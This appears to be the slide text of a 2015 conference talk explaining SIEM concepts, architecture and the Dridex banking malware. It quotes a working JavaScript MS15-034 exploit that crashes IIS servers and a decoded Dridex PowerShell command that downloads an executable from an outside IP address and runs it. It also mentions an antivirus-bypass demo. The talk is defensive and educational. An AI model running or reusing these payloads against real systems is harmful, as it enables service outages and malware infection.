Logicalis Security Conference

2015 Security Conference

Security, Information andEvent Management (SIEM)

Paul Dutot IEng MIET MBCS CITP QSTM OSCP


Who Am I • Head of Penetration Testing and SIEM within

Security Department @ Logicalis Jersey.

• Tiger Scheme accredited Penetration Tester.

• Certified in McAfee ESM and Vulnerability Manager.

• My role is a mix of ethical hacking and using those skills to provide Managed SIEM to our clients.

• Founder member of the CIISF and secretary of the Jersey BCS branch.

• Incorporated Engineer (IEng) / Chartered IT Professional (CITP).


Our clients

• Managed SIEM Incident Response – World Wide Engineering Company in 68 countries.

• Managed SIEM - Fortune 100 American Financial Business –23,000 IP’s in 26 countries.

• Managed SIEM for SMB’s – ranging from customers with 2 firewalls to 30 devices under management.

And everything in between………

All managed by staff at Logicalis In Jersey


What we shall talk about…

• SIEM Concepts

• What is SIEM. What does it solve?

• Meet the Dridex Malware

• Questions

• SIEM Architectures

• SIEM Features At A Glance

• Business Risks – Where are the threats?


Business Risks – Risks by Category

2014 2015Source: Verizon Data Breach report


Business Risks – Incident Categorization by Industry Sector

Source: Verizon Data Breach report


MS 15-034 - How Fast the Bad Guys Move…

Microsoft patch for MS15-034 to reversed engineered exploit for sale on the Darknet < 6 days.

<script>/*Name: IISer.htmDescription: Crashes a Windows IIS host vulnerable to MS15-034Author: Malik Mesellem (@MME_IT)*///Variablesvar ip = "10.0.1.1";var file = "welcome.png"; //For W2K8R2// var file = "iis-85.png"; //For W2K12R2var payload = "bytes=18-18446744073709551615"; //Tested on W2K8R2 and W2K12R2var xmlhttp = new XMLHttpRequest();//Sends the HTTP request 10 timesfor (i = 0; i < 10; i++){

xmlhttp.open("GET", "http://" + ip + "/" + file, true);xmlhttp.setRequestHeader("Range", payload);xmlhttp.send();

}alert("Bye bye IIS!");</script>

http://pastebin.com/SbN55M2H


“ 90% of all incidents is people. Whether it’s goofing up, getting infected, behaving badly or losing stuff, most incidents fall into the PEBKAC (Problem Exists Between Keyboard and Chair) and ID-10T (idiot) uber patterns.”

“Financial Motivation is also alive and well in phishing attacks. The old method of duping people into providing their personnel identification number or bank information is still around but the targets are largely individuals versus organizations. Phishing with the intent of device compromise is certainly present.”

Business Risks – Final Thoughts

Source: Verizon Data Breach report

Since October 2014, Jersey and Guernsey companies across all sectors have been targeted by the ‘Dridex’ malware through email phishing.


What is SIEM? What issues does it solve?

SIEM is the Evolution and Integration

of Two Distinct Technologies

Security Event Management (SEM)

― Primarily focused on Collecting and

Aggregating Security Events

Security Information Management (SIM)

― Primarily focused on the Enrichment,

Normalization, and Correlation of

Security Events

Security Information & Event

Management (SIEM) is a Set

of Technologies for: Log Data Collection

Correlation

Aggregation

Normalization

Retention

Analysis and Workflow

Three Major Factors Driving the Majority of SIEM Implementations

1Real-Time

Threat Visibility 2Security

Operational

Efficiency 3

Compliance and/or Log

Management Requirements


SIEM Concepts – Visibility Problem

FACT: A small network with 20 Desktops will produce an average 46 events per second (EPS) = 165,600 per hour = 3,974,400 per diem. Bursts of events are 1.5 times this figure.

Do you fancy trying to investigate that amount of events for a security issue?


SIEM Concepts – Compliance Problem

PCI-DSS Compliance is one of the main drivers for a SIEM solution.

Meeting Section 10 – Logging Requirements is almost impossible without a SIEM!

There are at least 20 use cases to use SIEM to meet aspects of PCI-DSS – see http://resources.infosecinstitute.com/siem-use-cases-pci-dss-3-0-part-1/

http://resources.infosecinstitute.com/siem-use-cases-pci-dss-3-0-part-1/


SIEM Concepts – Anatomy of an Event / Flow Life

Raw Logs / Flows

<164>Apr 15 2015 10:04:53: %ASA-4-106023: Deny tcp src

InsideLAN:192.168.4.35/50381 dstOutside:216.41.215.186/80 by

access-group "inside_in" [0x0, 0x0]

Raw Logs stored and forensically tagged.

Raw logs are normalised.Log Processed by Correlation

Engine

Raw logs stored in raw format.

Security Alert !!

• Events come from devices such as workstations, routers , AD servers and security devices.

• Flows come from flow collectors or flow enabled devices such as firewalls.

• Lots of different flow types supported such as Netflow / Qflow.

• Lots of different device types and logging options.

Normalisation = the process of getting different record formats from different devices into a common format.

SIEM solutions are sized by capacity in term of Events Per Second (EPS) primarily.


SIEM Concepts – Correlation

• Correlation is the process of looking at events to determine relevance and relationships to other events within the network for example successful login after brute force.

• It can be applied in real time and historical modes with a variety of rule types.

• 175+ Correlation rules enabled by default.

• Correlation enables us to gain visibility into other non traditional IT systems such as Access Control and BMS.

• Correlation rules combined with Watch Lists allow us to track security incidents in real time such as a malware infection.


SIEM Architecture – ESM / REC / ELM

ELM

Servers WirelessAccess Points

Main Office

VPN Endpoints

IDS / IPS

Switches / Routers

Linux

Desktops

Receiver

ESM

• Events / Flows arrive at the receiver.

• Raw logs are tagged and stored in the Enterprise Log Manager (ELM).

• Normalisation and Correlation takes place in the Enterprise Security Manager (ESM).

• Log collection can be in various formats (Syslog / SDEE for example).

• Desktop collection cane be agent based such as OSSEC HIDS or agentless e.g. WMI.

• Solution can be ‘Cloud’ or ‘On Premise’ or a ‘Hybrid’ with high availability.


12 3

SIEM Features – At A Glance

• Powerful Investigation of Events –find what is important in 3 clicks.

• Case Management of Incidents.

• Automate responses to Incidents.

• API to Interrogate / Update SIEM.

• Anomaly Behaviour Detection.

• Custom Dashboards and Powerful Reporting.

• Zone Management.

• Integration with Threat Intelligence Feeds – Public and Private.

• Data Enrichment allows us to further augment log content.


Why use a Logicalis Managed SIEM solution?

• Expertise – Logicalis Jersey is the World Wide security centre of excellence for Logicalis Group.

• Cost.

• Flexible consumption models.

• Strategic Partners.

• ISO27001 Certified.

• Redundant Data Centres in Jersey and Guernsey resolving jurisdictional data issues.

• Our multi tenanted solution ensures data segregation at all levels.


Meet Dridex – Banking Malware

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodf

hioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start

%TEMP%\JIOiodfhioIH.exe;

It has code hidden in Excel spreadsheet

VBA macro virus with hidden URL

When decoded it becomes…..

Feb 2015: Only 3 out of 57 AV Engines detected it. Apr 20-15 : 39 out of 55


Dridex C2 Server Operator

File Server

AD DomainServer

Database Server

Higher Level Hacker

ACME Trust – Anatomy of a Compromise

Database Server credentials are obtained and the Database Server is compromised. Data exfiltration begins..

Eventually AD compromised = network compromised. You could find out like this……

Malware installs a Key Logger and a Remote Access Trojan (RAT).

Access sold to higher level hacker. Hacker uses already compromised credentials to upload Trojan versions / documents to the file server using credentials obtained via key logger.


Real Reputational Damage

http://dpaste.dzfl.pl/866433ffd07a


Demo Time

Bypassing Anti Virus using Windows Powershell in Excel


One for the Defenders

Hunting Malware with SysInternals Suite

Video

https://www.youtube.com/watch?v=Wuy_Pm3KaV8

PowerPoint

video.ch9.ms/sessions/teched/na/2014/DCIM-B368.pptx

“When combining the results from all four AV engines, less than 40% of the binaries were detected.”

Source: CAMP: Content-Agnostic Malware ProtectionProceedings of 20th Annual Network & Distributed System Security Symposium

https://www.youtube.com/watch?v=Wuy_Pm3KaV8

video.ch9.ms/sessions/teched/na/2014/DCIM-B368.pptx


Thank You

Questions

Technology

Logicalis Security Conference